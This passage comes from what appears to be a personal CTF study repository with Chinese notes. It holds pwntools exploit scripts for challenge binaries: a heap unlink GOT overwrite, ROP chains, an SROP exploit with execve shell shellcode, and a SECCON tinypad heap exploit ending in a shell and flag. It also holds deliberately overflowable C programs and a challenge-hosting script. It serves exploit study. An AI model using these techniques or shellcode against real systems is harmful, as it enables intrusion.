shellcode_size + libc_free_got 72 | # leak 73 | free_got = 0x0000000000601600 74 | payload = p64(0x0) + p64(0x1) + p64(0xa) + p64(free_got) 75 | edit_sh(0, payload2) 76 | free_address = list_sh() 77 | print "free_address:", hex(free_address) 78 | # 计算system地址 79 | lib_sys_addr = 0x0000000000046590 80 | lib_free_addr = 0x0000000000082d00 81 | #lib_sys_addr = 0x46640 82 | #lib_free_addr = 0x82df0 83 | system_addr = free_address - lib_free_addr + lib_sys_addr 84 | print "system_addr:", hex(system_addr) 85 | # 修改got表中free地址为system 86 | edit_sh(0, p64(system_addr)) 87 | # 触发free(实际上已经修改成了system) 88 | del_sh(2) 89 | p.interactive() 90 | 91 | main() 92 | 93 | -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/shellman: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/shellman -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/shellman.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/shellman.i64 -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/unlink.md: -------------------------------------------------------------------------------- 1 | ## struct bins 2 | 3 | ```C 4 | struct malloc_chunk { 5 | INTERNAL_SIZE_T prev_size; 6 | INTERNAL_SIZE_T size; 7 | struct malloc_chunk * fd; 8 | struct malloc_chunk * bk; 9 | }; 10 | ``` 11 | 12 | ## unlink 13 | 14 | ```C 15 | /* Take a chunk off a bin list */ 16 | #define unlink(P, BK, FD) { \ 17 | FD = P->fd; \ 18 | BK = P->bk; \ 19 | if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \ 20 | malloc_printerr (check_action, "corrupted double-linked list", P); \ 21 | else { \ 22 | FD->bk = BK; \ 23 | BK->fd = FD; \ 24 | if (!in_smallbin_range (P->size) \ 25 | && __builtin_expect (P->fd_nextsize != NULL, 0)) { \ 26 | assert (P->fd_nextsize->bk_nextsize == P); \ 27 | assert (P->bk_nextsize->fd_nextsize == P); \ 28 | if (FD->fd_nextsize == NULL) 29 | { 30 | if (P->fd_nextsize == P) \ 31 | FD->fd_nextsize = FD->bk_nextsize = FD; \ 32 | else { \ 33 | FD->fd_nextsize = P->fd_nextsize; \ 34 | FD->bk_nextsize = P->bk_nextsize; \ 35 | P->fd_nextsize->bk_nextsize = FD; \ 36 | P->bk_nextsize->fd_nextsize = FD; \ 37 | } \ 38 | } else { \ 39 | P->fd_nextsize->bk_nextsize = P->bk_nextsize; \ 40 | P->bk_nextsize->fd_nextsize = P->fd_nextsize; \ 41 | } \ 42 | } \ 43 | } \ 44 | } 45 | ``` 46 | 47 | ## result 48 | 49 | 64bit 50 | ```C 51 | FD = fake_fd = target_addr - 0x18 52 | BK = fake_bk = target_addr - 0x10 53 | //then 54 | FD + 0x18 = BK = target_addr - 0x10 55 | BK + 0x10 = FD = target_addr - 0x18 56 | // thus 57 | *target_addr = target_addr - 0x18 58 | ``` 59 | 60 | 32bit 61 | ```C 62 | FD = fake_fd = target_addr - 0x0c 63 | BK = fake_bk = target_addr - 0x08 64 | //then 65 | FD + 0x18 = BK = target_addr - 0x08 66 | BK + 0x10 = FD = target_addr - 0x0c 67 | // thus 68 | *target_addr = target_addr - 0x0c 69 | ``` 70 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/exp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/exp4 -------------------------------------------------------------------------------- /Pwn/examples/rop_64/level4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/level4 -------------------------------------------------------------------------------- /Pwn/examples/rop_64/linux_64_rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/linux_64_rop -------------------------------------------------------------------------------- /Pwn/examples/rop_64/linux_64_rop.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void callsystem() 6 | { 7 | system("/bin/sh"); 8 | } 9 | 10 | void vulnerable_function() 11 | { 12 | char buf[128]; 13 | read(STDIN_FILENO, buf, 512); 14 | } 15 | 16 | int main() 17 | { 18 | write(STDOUT_FILENO, "Hello, seigai\n", 14); 19 | vulnerable_function(); 20 | } 21 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/linux_64_sh.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | void systemaddr() 7 | { 8 | void* handle = dlopen("libc.so.6", RTLD_LAZY); 9 | printf("%p\n",dlsym(handle,"system")); 10 | fflush(stdout); 11 | } 12 | 13 | void vulnerable_function() 14 | { 15 | char buf[128]; 16 | read(STDIN_FILENO, buf, 512); 17 | } 18 | 19 | int main(int argc, char** argv) 20 | { 21 | systemaddr(); 22 | write(1, "Hello, World\n", 13); 23 | vulnerable_function(); 24 | } 25 | 26 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/lv4.py: -------------------------------------------------------------------------------- 1 | #!python 2 | #!/usr/bin/env python 3 | from pwn import * 4 | from zio import * 5 | 6 | libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') 7 | 8 | io = zio('./level4') 9 | #p = remote('127.0.0.1',10001) 10 | 11 | binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] 12 | #print "binsh_addr_offset = " + hex(binsh_addr_offset) 13 | 14 | pop_ret_offset = 0x0000000000022b9a - libc.symbols['system'] 15 | #print "pop_ret_offset = " + hex(pop_ret_offset) 16 | 17 | #print "\n##########receiving system addr##########\n" 18 | system_addr = 0x7f2e1d466590 19 | print "system_addr = 0x%x" %system_addr 20 | 21 | binsh_addr = system_addr + binsh_addr_offset 22 | print "binsh_addr = " + hex(binsh_addr) 23 | 24 | 25 | pop_ret_addr = system_addr + pop_ret_offset 26 | print "pop_ret_addr = " + hex(pop_ret_addr) 27 | #p.recv() 28 | 29 | 30 | 31 | payload = "A"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr) 32 | print payload 33 | 34 | #p.send(payload) 35 | 36 | #p.interactive() 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/pattern.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from pwn import * 3 | #elf = ELF('linux_64_rop') 4 | #pro = process('./linux_64_rop') 5 | #pro = remote('127.0.0.1', 10000) 6 | padding = "" 7 | for i in range(136): 8 | padding += 'A' 9 | #0x7ff145e76590 10 | #0x00000000004005bd 11 | sys_addr = "\xbd\x05\x40\x00\x00\x00\x00\x00" 12 | 13 | payload = padding + sys_addr 14 | print payload 15 | #pro.send(payload) 16 | #pro.interactive() 17 | -------------------------------------------------------------------------------- /Pwn/examples/rop_64/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_64/payload -------------------------------------------------------------------------------- /Pwn/examples/rop_chain/README.md: -------------------------------------------------------------------------------- 1 | ## rop 2 | 主要是64bit的 3 | 4 | ## func 5 | 6 | 64bit构造rop,利用libc_cus_init处相关rop。 7 | 8 | ropper查找较全面 9 | 10 | 11 | ```Python 12 | def prod_rop3(func_addr, arg1, arg2, arg3): 13 | payload = p64(rop64_step1_addr) 14 | payload += p64(0) 15 | payload += p64(0) # rbx 16 | payload += p64(1) # rbp 17 | payload += p64(func_addr) # r12 18 | payload += p64(arg1) # r13 19 | payload += p64(arg2) # r14 20 | payload += p64(arg3) # r15 21 | payload += p64(rop64_step2_addr) # ret to step2 22 | payload += 'r'*rop_pad_size # padding 23 | payload += p64(main_vuln_addr) # return to main vuln 24 | return payload 25 | 26 | ``` 27 | 28 | -------------------------------------------------------------------------------- /Pwn/examples/rop_chain/rop_test64.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | context.kernel = "amd64" 5 | LOCAL = True 6 | 7 | def mt_send(io, data): 8 | io.send(dtat) 9 | time.sleep(0.1) 10 | 11 | # main vuln address define 12 | main_vuln_addr = 0x400544 13 | rop64_step1_addr = 0x4005E6 14 | rop64_step2_addr = 0x4005D0 15 | rop_pad_size = 0x38 16 | 17 | # start pwn 18 | elf = ELF("./unexploitable") 19 | if LOCAL: 20 | context.log_level = 'debug' 21 | io = process("./unexploitable") 22 | else: 23 | io = remote("pwnable.kr", 22333) 24 | 25 | def prod_rop3(func_addr, arg1, arg2, arg3): 26 | payload = p64(rop64_step1_addr) 27 | payload += p64(0) 28 | payload += p64(0) # rbx 29 | payload += p64(1) # rbp 30 | payload += p64(func_addr) # r12 31 | payload += p64(arg1) # r13 32 | payload += p64(arg2) # r14 33 | payload += p64(arg3) # r15 34 | payload += p64(rop64_step2_addr) # ret to step2 35 | payload += 'r'*rop_pad_size # padding 36 | payload += p64(main_vuln_addr) # return to main vuln 37 | return payload 38 | 39 | def un_exp(): 40 | time.sleep(3) 41 | payload = 'p'*0x18 42 | payload += prod_rop3(elf.got['read'], 0, 0x601030, 0x08) 43 | io.send(payload) 44 | time.sleep(0.4) 45 | io.send('ffffffff') 46 | 47 | if __name__ == '__main__': 48 | raw_input("start") 49 | un_exp() 50 | raw_input("end") 51 | 52 | 53 | -------------------------------------------------------------------------------- /Pwn/examples/rop_chain/unexploitable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/rop_chain/unexploitable -------------------------------------------------------------------------------- /Pwn/examples/srop/README.md: -------------------------------------------------------------------------------- 1 | # SROP 2 | 3 | SROP是一种特殊的rop。 4 | 5 | ## Vuln 6 | 程序漏洞明显,就是栈溢出,而且没有加载so库,只有短短几十字节代码。 7 | 8 | ## leak 9 | leak的话,利用write函数即可 10 | 11 | ```Python 12 | def sm_leak(): 13 | payload = p64(main_vuln_addr)*3 14 | io.send(payload) 15 | payload = p64(0x4000B3)[0] # write(1, stack, 0x400) 16 | io.send(payload) 17 | data = io.recv(0x200) 18 | io.clean() 19 | return data 20 | ``` 21 | 22 | 主要的技巧就是: 23 | 24 | 1. 先读取一次,这样栈上先覆盖几个main函数地址。 25 | 2. 读取第二次的时候,故意取n个字节读取,从而控制rax的值。(根据read返回值是读取到的字节数) 26 | 3. 注意第二次读取的时候,ret的地址要改成syscall 27 | 28 | ## SROP 29 | 新姿势srop 30 | ### Ref 31 | [srop原理](http://www.freebuf.com/articles/network/87447.html) 32 | 33 | 34 | ```Python 35 | def sm_func(func_id, marg0, marg1, marg2, mstack, mrip): 36 | mframe = SigreturnFrame() 37 | mframe.rax = func_id 38 | mframe.rdi = marg0 39 | mframe.rsi = marg1 40 | mframe.rdx = marg2 41 | mframe.rsp = mstack 42 | mframe.rip = mrip 43 | sig_padding = p64(main_vuln_addr) 44 | sig_padding += p64(syscall_addr) 45 | payload = sig_padding + str(mframe) 46 | return payload 47 | ``` 48 | ### step1 49 | 首先要把之前leak的栈地址给填充真正的rop 50 | 51 | ```Python 52 | lk_use_addr = sm_leak()[0x10:0x18] 53 | lk_use_addr = (u64(lk_use_addr)-0x400)&0xFFFFFFFFFFFFF000 54 | log.info("rop address : " + hex(lk_use_addr)) 55 | payload = sm_func(constants.SYS_read, constants.STDIN_FILENO, lk_use_addr, 0x400, lk_use_addr, syscall_addr).ljust(0x400, chr(0)) 56 | io.send(payload) 57 | payload = payload[8:23] 58 | io.send(payload) 59 | ``` 60 | 61 | ### 调用mprotect 62 | 63 | 调用mrpotct并且rsp转移到一个地址,这个地址填充shellcode地址。
64 | 65 | 66 | ```Python 67 | # size must be 0x1000*n 68 | # mprotect(lk_use_addr, 0x1000, 7) 69 | payload = sm_func(constants.SYS_mprotect, lk_use_addr, 0x1000, 7, lk_use_addr+0x200, syscall_addr).ljust(0x200, chr(0)) 70 | payload += p64(lk_use_addr+0x208) # rop to shellcode address 71 | payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 72 | io.send(payload.ljust(0x400, chr(0))) 73 | payload = payload[8:23] 74 | io.send(payload) 75 | io.interactive() 76 | ``` 77 | 78 | ## Tips 79 | 注意,read是阻塞,所以send后面需要加延时,这样才不使得read(0, buf, 0x400)一定是接收0x400字节 80 | -------------------------------------------------------------------------------- /Pwn/examples/srop/sh_exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2.7 2 | # coding:utf-8 3 | from pwn import * 4 | import time 5 | 6 | elf = ELF("./smallest") 7 | LOCAL = True 8 | context.clear(arch="amd64") 9 | #context.log_level = 'debug' 10 | 11 | main_vuln_addr = 0x4000B0 12 | syscall_addr = 0x4000BE 13 | if LOCAL: 14 | io = process("./smallest") 15 | else: 16 | io = remote("127.0.0.1", 22333) 17 | #io = remote("106.75.93.227", 20000) 18 | 19 | def sm_leak(): 20 | payload = p64(main_vuln_addr)*3 21 | io.send(payload) 22 | time.sleep(1) 23 | payload = p64(0x4000B3)[0] # write(1, stack, 0x400) 24 | io.send(payload) 25 | time.sleep(1) 26 | data = io.recv(0x200) 27 | io.clean() 28 | return data 29 | 30 | def sm_func(func_id, marg0, marg1, marg2, mstack, mrip): 31 | mframe = SigreturnFrame() 32 | mframe.rax = func_id 33 | mframe.rdi = marg0 34 | mframe.rsi = marg1 35 | mframe.rdx = marg2 36 | mframe.rsp = mstack 37 | mframe.rip = mrip 38 | sig_padding = p64(main_vuln_addr) 39 | sig_padding += p64(syscall_addr) 40 | payload = sig_padding + str(mframe) 41 | return payload 42 | 43 | lk_use_addr = sm_leak()[0x10:0x18] 44 | lk_use_addr = (u64(lk_use_addr)-0x400)&0xFFFFFFFFFFFFF000 45 | log.info("rop address : " + hex(lk_use_addr)) 46 | payload = sm_func(constants.SYS_read, constants.STDIN_FILENO, lk_use_addr, 0x400, lk_use_addr, syscall_addr).ljust(0x400, chr(0)) 47 | io.send(payload) 48 | time.sleep(1) 49 | payload = payload[8:23] 50 | io.send(payload) 51 | time.sleep(1) 52 | raw_input("what stack") 53 | 54 | # size must be 0x1000*n 55 | # mprotect(lk_use_addr, 0x1000, 7) 56 | payload = sm_func(constants.SYS_mprotect, lk_use_addr, 0x1000, 7, lk_use_addr+0x200, syscall_addr).ljust(0x200, chr(0)) 57 | payload += p64(lk_use_addr+0x208) # rop to shellcode address 58 | payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 59 | io.send(payload.ljust(0x400, chr(0))) 60 | time.sleep(1) 61 | payload = payload[8:23] 62 | io.send(payload) 63 | time.sleep(1) 64 | io.interactive() 65 | raw_input("end") 66 | 67 | 68 | 69 | -------------------------------------------------------------------------------- /Pwn/examples/srop/smallest: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/srop/smallest -------------------------------------------------------------------------------- /Pwn/examples/template.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time, sys 3 | 4 | 5 | # local process envirnoment 6 | LOCAL = False 7 | elf_name = "./pwn" 8 | 9 | #retmote args 10 | remote_host = "127.0.0.1" 11 | remote_port = 50002 12 | context.clear(arch="amd64") 13 | elf = ELF(elf_name) 14 | 15 | if LOCAL: 16 | smlbin_area_off = 0x3C3B78 17 | execv_binsh_off = 0xF0567 18 | malloc_hook_off = 0x3C3B10 19 | context.log_level = "debug" 20 | mine_env = os.environ 21 | mine_env['LD_PRELOAD'] = "/home/deadfish/Pwn/Tools/preeny/x86_64-linux-gnu/dealarm.so" 22 | io = process(elf_name, env=mine_env) 23 | else: 24 | #context.log_level = "debug" 25 | smlbin_area_off = 0x3C3B78 26 | execv_binsh_off = 0xF0567 27 | malloc_hook_off = 0x3C3B10 28 | io = remote(remote_host, remote_port) 29 | 30 | def dlySend(sdstr): 31 | io.send(sdstr) 32 | time.sleep(0.01) 33 | 34 | def mmenu(mindex): 35 | io.recvuntil("\n") 36 | io.sendline(str(mindex)) 37 | 38 | def s_exp(): 39 | print io.recvall() 40 | 41 | if __name__ == "__main__": 42 | s_exp() 43 | #pause() 44 | 45 | '''' 46 | PwnPineappleApplePwn 47 | https://www.youtube.com/watch?v=0E00Zuayv9Q 48 | '''' 49 | 50 | from pwn import * 51 | context.arch = 'amd64' 52 | #context.log_level = 'debug' 53 | 54 | p = process('./tinypad') 55 | #p = remote('tinypad.pwn.seccon.jp', 57463) 56 | p.recvuntil('>>> ') 57 | 58 | 59 | def debug(address): 60 | gdb.attach(p, 'b *0x%x' % address) 61 | raw_input() 62 | 63 | 64 | def add_memo(size,content): 65 | p.sendline('A') 66 | p.recvuntil('>>> ') 67 | p.sendline(str(size)) 68 | p.recvuntil('>>> ') 69 | p.sendline(content) 70 | p.recvuntil('>>> ') 71 | 72 | def delete_memo(idx): 73 | p.sendline('D') 74 | p.recvuntil('>>> ') 75 | p.sendline(str(idx)) 76 | p.recvuntil('>>> ') 77 | 78 | def edit_memo(idx, content): 79 | p.sendline('E') 80 | p.recvuntil('>>> ') 81 | p.sendline(str(idx)) 82 | p.recvuntil('>>> ') 83 | p.sendline(content) 84 | p.recvuntil('>>> ') 85 | p.sendline('Y') 86 | p.recvuntil('>>> ') 87 | 88 | unsorted_bin_offset = 0x7fa55f51c7b8 - 0x7fa55f15e000 89 | 90 | prev_size = 0x100 91 | chunk_size = 0x40 92 | 93 | # Vuln1: When deleting memo, there isn't address nullify (just size filed = 0)& When showing memo, there isn't checking size field. => Memory leak 94 | # Vuln2: Can modify next chunk's prev_size & size's Last byte to Null. (We must set next chunk's size > 0x100) => Heap Exploit 95 | 96 | 97 | # Using Vuln1 98 | add_memo(256, 'A'* 8) # Chunk 1 & Memo1 99 | add_memo(256, 'B'* 8) # Chunk 2 & Memo2 100 | add_memo(256, 'B'* 8) # Chunk 3 & Memo3 101 | add_memo(256, 'B'* 8) # Chunk 4 & Memo4 102 | delete_memo(3) # free(Chunk1) Put Chunk1 to Unsorted Bin & Chunk1->fd = Unsorted Bin 103 | p.sendline('') 104 | p.recvuntil('INDEX: 3') 105 | p.recvuntil('CONTENT: ') 106 | leak = p.recv(8192) 107 | 108 | unsorted_bin = int(leak[:6][::-1].encode('hex'), 16) 109 | 110 | libc_base = unsorted_bin - unsorted_bin_offset 111 | print '[+] unsorted_bin : 0x%x' % unsorted_bin 112 | print '[+] libc base: 0x%x' % libc_base 113 | 114 | delete_memo(1) 115 | p.sendline('') 116 | p.recvuntil('INDEX: 1') 117 | p.recvuntil('CONTENT: ') 118 | leak = p.recv(4) 119 | if leak[3] == '\x0a': 120 | heap_base = u32(leak[0:3]+'\x00') 121 | else: 122 | heap_base = u32(leak) 123 | heap_base -= 0x220 124 | 125 | print '[+] heap base: 0x%x' % heap_base 126 | 127 | delete_memo(2) 128 | delete_memo(4) 129 | 130 | 131 | 132 | # Using Vuln2 133 | # Unsafe Unlink (https://github.com/shellphish/how2heap/blob/master/unsafe_unlink.c) 134 | add_memo(248, 'A'* 247) # Chunk 1 & Memo1 135 | add_memo(248, 'B'* 247) # Chunk 2 & Memo2 136 | delete_memo(1) 137 | 138 | prev_size = 256 - 8*2 139 | # Pop Chunk1 & Memo1 & Chunk2.size = 0x110-> 0x100 (by null turminate bug) & P->FD->BK == P && P->BK->FD == P 140 | add_memo(248, p64(0) + p64(0) +p64(0x602040 + 0x100 + 8 - 8*3) + p64(0x602040 + 0x100 + 8 - 8*2) + 'A' * 208 + p64(prev_size)) 141 | add_memo(256, 'D'* 255) # Chunk3 & Memo3 142 | delete_memo(2) # Consolidate with Chunk1 P->FD->BK = P->BK , P->BK->FD = P->FD 143 | 144 | ''' 145 | 0x602120 : 0x0000000000000000 146 | 0x602128 : 0x0000000000000000 147 | 0x602130 : 0x0000000000000000 148 | 0x602138 : 0x0000000000000000 149 | 0x602140 : 0x00000000000000f8 150 | 0x602148 : 0x0000000000602130 : P->FD->BK = P->BK 151 | ''' 152 | 153 | 154 | # Make fake chunk on tinypad+224 155 | prev_size = 0x40 156 | size = heap_base + 0x310 - 0x602120 + 0x1 # heap_base + 0x310 = Top chunk 157 | edit_memo(3, 'A'* (256 - 32) + p64(prev_size) + p64(size) + 'A' * 15) 158 | delete_memo(1) # free(0x602130) Consolidate with Top chunk 159 | 160 | # Consume all last reminder 161 | add_memo(112, 'D' * 112) 162 | delete_memo(1) 163 | add_memo(96, 'D' * 96) 164 | delete_memo(1) 165 | add_memo(80, 'D' * 80) 166 | delete_memo(1) 167 | add_memo(64, 'D' * 64) 168 | delete_memo(1) 169 | add_memo(48, 'D' * 48) 170 | delete_memo(1) 171 | 172 | 173 | environ_offset = 0x5e9178 174 | oneshot_gadget_offset = 0xe66bd 175 | pad_size = 'A' * 8 176 | pad1_address = libc_base + environ_offset 177 | pad2_address = 0x602140 + 8 * 4 178 | 179 | # Malloc from top chunk (0x602130) 180 | add_memo(256 , 'A' * 16+ pad_size + p64(pad1_address) + pad_size + p64(pad2_address) + pad_size + p64(pad1_address) + pad_size + p64(0)) 181 | 182 | p.sendline('') 183 | p.recvuntil('INDEX: 1') 184 | p.recvuntil('CONTENT: ') 185 | envp = u64(p.recv(6)+'\x00\x00') 186 | print '[+] envp = 0x%x' % envp 187 | 188 | edit_memo(2, pad_size + p64(envp - 0xf0)) # pad3_address = return address 189 | edit_memo(3, p64(libc_base + oneshot_gadget_offset)) # return address = oneshot_gadget 190 | p.interactive() 191 | 192 | ''' 193 | (CMD)>>> $ Q 194 | $ id 195 | uid=10545 gid=1001(tinypad) groups=1001(tinypad) 196 | $ ls 197 | flag.txt 198 | run.sh 199 | tinypad-0e6d01f582e5d8f00283f02d2281cc2c661eba72 200 | $ cat flag.txt 201 | Congratz! Yo got the flag! 202 | SECCON{5m45h1n9_7h3_574ck_f0r_fun_4nd_p40f17_w1th_H0u53_0f_31nh3rj4r} 203 | $ 204 | ''' 205 | -------------------------------------------------------------------------------- /Pwn/pwn_pwn.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/pwn_pwn.jpg -------------------------------------------------------------------------------- /Pwn/socat_pwn.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Start script $0" 4 | echo "check flag file" 5 | directory="." 6 | flag_file="flag.txt" 7 | if [ -f $flag_file ] 8 | then 9 | echo "flag is `cat $flag_file`" 10 | chmod 755 $directory/* 11 | else 12 | echo "flag file flag.txt does not exists" 13 | exit 1 14 | fi 15 | 16 | docker_img="ubuntu:pwn" 17 | docker_dir="/home/pwn" 18 | echo "args is $#" 19 | if [ $# == 2 ] 20 | then 21 | elf_file=$1 22 | socat_port=$2 23 | container_id=`docker run -it -d -p $2:$2 --name $elf_file $docker_img` 24 | docker cp $directory/$flag_file $container_id:$docker_dir 25 | docker cp $directory/$elf_file $container_id:$docker_dir 26 | docker exec -u pwn $container_id socat tcp-listen:$socat_port,reuseaddr,fork system:$docker_dir/$elf_file & 27 | else 28 | echo "format: $0 [elf_file] [port]" 29 | exit 1 30 | fi 31 | 32 | 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | $$$$$$$$$ $$$ 2 | $$$ $$$$ 3 | $$$ $$$ $$$ $$$$ $$$$$ $$$d $$$ $$$ 4 | $$$ $$$ $$$ $ $$$$$$$ f$$$ $$$ $$$$$$d $$$ $$$ 5 | $$$$$$$$$$ $$$ $$$ $$ $$$$ $$$ $$$ $$$ 6 | $$$ $$$ $$$ $$$ $$$ f$$$$$$$$ $$ $$ $$$ 7 | $$$ $$$ $$$ $$$ $$$ $$$ $$$ $$ $$ $$ 8 | $$$ $$$$ $$$ $$$ $$$ $$$f $$$ $$ $$$$$$ 9 | $$$$$$$$$$ $$$ $$$ $$$ $$$$$$$$$ $$ $$$$ 10 | $$ $$$ 11 | $$$ 12 | $$$$ 13 | $ 14 | 15 | > 随手写的笔记,算是学习过程的一点记录,忘记的时候也可以方便查 16 | 17 | ## 1.Reverse 18 | Some writeups of CTF and exercises 19 | ### Books 20 | 1. [RE4B-ch](https://github.com/dennis714/reverse-engineering-for-beginners)
21 | 2. [RE4B-en](https://beginners.re/RE4B-EN.pdf)
22 | 3. [IDA Pro 权威指南](http://www.ituring.com.cn/book/791) 推荐 IDA真的很强大 OD感觉可能有点过时
23 | 4. [逆向工程核心原理](http://www.ituring.com.cn/book/1266)
24 | 5. [加密与解密](http://bbs.pediy.com/showthread.php?t=66210)
25 | 6. [C++反汇编与逆向分析技术揭秘](http://bbs.pediy.com/showthread.php?t=140350)
26 | 27 | ### Sites 28 | 1. [看雪](http://www.pediy.com/)
29 | 2. [52破解](http://www.52pojie.cn/)
30 | 3. [i春秋](http://www.ichunqiu.com/)
31 | 32 | 33 | ## 2.Pwn 34 | Some tips about Pwn 35 | ### Sites 36 | 1. [resource recommand](http://www.pentest.guru/index.php/2016/01/28/best-books-tutorials-and-courses-to-learn-about-exploit-development/) 推荐一些exploit学习资源 开始就是看这个的
37 | 2. [DEF CON](https://www.defcon.org/#) 资讯
38 | 3. [tisiphone](https://tisiphone.net/) 咨询
39 | 4. [exploit database](https://www.exploit-db.com/) 提供各种漏洞
40 | 5. [shellcode](http://shell-storm.org/shellcode/) 各种shellcode都有
41 | 6. [How2Heap](https://github.com/shellphish/how2heap) 主要是linux堆溢出相关,很好的入门资料
42 | 7. [LiveOverFlow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) youtube有相关视频 从他的视频学了不少
43 | 8. [CTF writeup](https://github.com/ctfs) 各种writeup (大多国外)
44 | 45 | ### CTFer-bin 46 | - [muhe](http://o0xmuhe.me/)
47 | - [hackfun](https://www.hackfun.org/)
48 | 49 | - xidian 50 | - [Icemakr](http://0byjwzsf.me/) LCTF2016 pwn出题大大
51 | - [Zing](http://l-team.org/)
52 | - [math1as](http://www.math1as.com/) 原来这个dalao是西电的啊 - - 有pwnable wp
53 | - [sh3ll](http://sh3ll.me/)
54 | - [tang](http://bigtang.org/)
55 | - [uaf](http://uaf.io/) 国外一位,各种ctf wp都有他的身影 56 | 57 | ### Books 58 | 1. [深入理解计算机系统](https://github.com/Urinx/Books/blob/master/cs/%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F.pdf) 涉及基本linux相关和语言
59 | 一些笔记 [1](http://blog.sina.com.cn/s/blog_6874dd910101l3lx.html), [2](https://www.gitbook.com/book/xxg1413/csapp/details), [3](http://wdxtub.com/2016/04/16/thin-csapp-0/) 60 | 2. [Linux程序设计/Beginning Linux Programming](http://www.ituring.com.cn/book/171) 开发是很有必要的
61 | 3. [鸟哥的linux私房菜](http://cn.linux.vbird.org/)
要学linux相关机制和命令的很不错的一本
62 | 63 | ## 3.Exploit 64 | 漏洞实战 计划最近进行 QAQ 65 | ### Reference sites 66 | 1. [ninehackers](http://www.ninehackers.com/) 有很多exploit开发的文章
67 | 2. 泉哥 68 | [riusksk](http://riusksk.me/) 《漏洞战争》作者
69 | 3. 余弦
70 | - [evilcos](http://evilcos.me/) 有技能表
71 | - [known-知道创宇](http://blog.knownsec.com/) 可以学点哲学
72 | - [懒人在思考](https://zhuanlan.zhihu.com/evilcos)
73 | 4. [腾讯玄武实验室](http://xlab.tencent.com/cn/) 漏洞发布
74 | 5. [netfairy](http://www.netfairy.net/)
75 | 6. [See bugs](https://www.seebug.org/)
76 | 7. [Black Hat](https://www.blackhat.com/)
77 | 8. [FreeBuf](http://freebuf.com/)
78 | 79 | ### Resource sites 80 | 1. [Old Version Downloads](http://www.oldapps.com) 老版OS和软件 研究漏洞很有用
81 | 2. [Old OS](http://www.oldversion.com) 同上
82 | 3. [Flash](http://www.abysssec.com/blog/2011/04/18/exploiting-adobe-flash-player-on-windows-7/) flash漏洞研究
83 | 4. [基础漏洞分析](http://ensiwiki.ensimag.fr/images/6/61/SecurIMAG-2011-11-17-teach-a_long_way_from_browser_vulnerability_to_kernel_exploitation.pdf) CVE-2010-0094/CVE-2010-3081 分析
84 | 85 | ### Books 86 | 1. [0day漏洞]()
87 | 2. [漏洞战争-配套资料](https://github.com/riusksk/vul_war) 书淘宝都直接找 漏洞分析cve等 很难
88 | 89 | ## 4.Hardware 90 | 硬件方面由于稍微写过点,不过安全方面没研究过
91 | 92 | ### Books 93 | 1. [0day路由器](http://item.jd.com/11734639.html) 没看过 应该很6
94 | 2. [无线电安全](https://item.jd.com/10340018520.html)
95 | 96 | ### Sites 97 | 1. [Hardware Sec](http://www.sp3ctr3.me/hardware-security-resources/) 资料推荐= = 很高大上
98 | 2. [Scanline dalao](http://scanlime.org/) 艺术家+硬件hacker
99 | 3. [Mouse Crack](https://github.com/BastilleResearch/mousejack) 无线鼠标键盘的
100 | 4. [路由器](http://www.routerpwn.com/) 路由器安全论坛
101 | 5. [openwrt](https://openwrt.org/) 路由器固件
102 | 103 | ## 5.CTFs 104 | 1. [cumt sec](http://www.bxsteam.xyz/) cumt的 为自己学校奶一口
105 | 2. [ISCC](http://lazymind.me/2016/05/iscc-2016-ctf-writeup/) 这里只有一部分
